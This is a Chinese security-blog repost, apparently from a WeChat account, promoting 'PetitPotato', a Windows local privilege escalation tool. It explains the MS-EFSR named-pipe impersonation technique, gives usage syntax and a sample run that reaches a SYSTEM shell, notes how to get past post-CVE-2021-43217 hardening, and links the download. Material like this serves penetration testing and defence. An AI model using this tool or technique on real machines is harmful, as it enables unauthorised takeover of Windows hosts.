PetitPotamv2.0本地域权限提升工具

adopi

原文链接：PetitPotamv2.0本地域权限提升工具
声明：该公众号分享的安全工具和项目均来源于网络，仅供安全研究与学习之用，如用于其他用途，由使用者承担全部法律及连带责任，与工具作者和本公众号无关。
简介
通过 PetitPotam 进行本地提权（完美适用于 Windows 21H2 10.0.20348.1547）
描述

PetitPotam使用 MS-EFSR（远程加密文件系统），这是一种用于对远程存储和通过网络访问的加密数据执行维护和管理操作的协议。有一系列类似于EfsRpcOpenFileRawMS-EFSR 中的 API。API的语法EfsRpcOpenFileRaw如下所示。

1. long EfsRpcOpenFileRaw(
   
2.    [in] handle_t binding_h,
   
3.    [out] PEXIMPORT_CONTEXT_HANDLE* hContext,
   
4.    [in, string] wchar_t* FileName,
   
5.    [in] long Flags
   
6. );

复制代码

此类 API 可以通过 FileName 参数指定 UNC 路径，以打开服务器上的加密对象以进行备份或还原。\\IP\C$当指定格式的路径时，lsass.exe 服务将以帐户\\IP\pipe\srvsvc权限访问NT AUTHORITY SYSTEM。

如果我们可以调用EfsRpcOpenFileRawAPI 强制本地计算机连接到我们创建的恶意命名管道，那么我们就可以模拟命名管道客户端进程并最终获得 SYSTEKM 权限。

用法

1. PetitPotato.exe [EfsID] [Command]
   
2. EfsID：要使用的 MS-EFSR API 编号
   
3. Command: 要执行的命令

复制代码

例子

1. C:\Users\Administrator\Desktop>PetitPotato.exe 3 cmd.exe
   
2. 
   
3. [+] Malicious named pipe running on \\.\pipe\petit\pipe\srvsvc.
   
4. [+] Invoking EfsRpcQueryUsersOnFile with target path: \\localhost/pipe/petit\C$\wh0nqs.txt.
   
5. [+] The connection is successful.
   
6. [+] ImpersonateNamedPipeClient OK.
   
7. [+] OpenThreadToken OK.
   
8. [+] DuplicateTokenEx OK.
   
9. [+] CreateProcessAsUser OK.
   
10. Microsoft Windows [Version 10.0.20348.1547]
    
11. (c) 2019 Microsoft Corporation. All rights reserved.
    
12. 
    
13. C:\Windows\system32>whoami
    
14. nt authority\system
    
15. 
    
16. C:\Windows\system32>

复制代码

更新于 2023/03/14

由于相关补丁的限制，PetitPotam 不适用于较新版本的 Windows。但是，在调用 EFS 之前将 AuthnLevel 设置为RPC_C_AUTHN_LEVEL_PKT_PRIVACYviaRpcBindingSetAuthInfoW在最新系统上有效。

2021 年 12 月，Microsoft 发布了针对不同 EFSRPC 漏洞的补丁：CVE-2021-43217。作为该问题补救措施的一部分，Microsoft 对 EFSRPC 通信实施了一些强化措施。特别是，EFSRPC 客户端在使用 EFSRPC 时需要使用 RPC_C_AUTHN_LEVEL_PKT_PRIVACY。如果客户端未能这样做，则客户端将被拒绝并生成 Windows 应用程序事件。

目前项目在Windows 21H2 10.0.20348.1547上可以完美提升到SYSTEM。

下载地址：https://github.com/wh0amitz/PetitPotato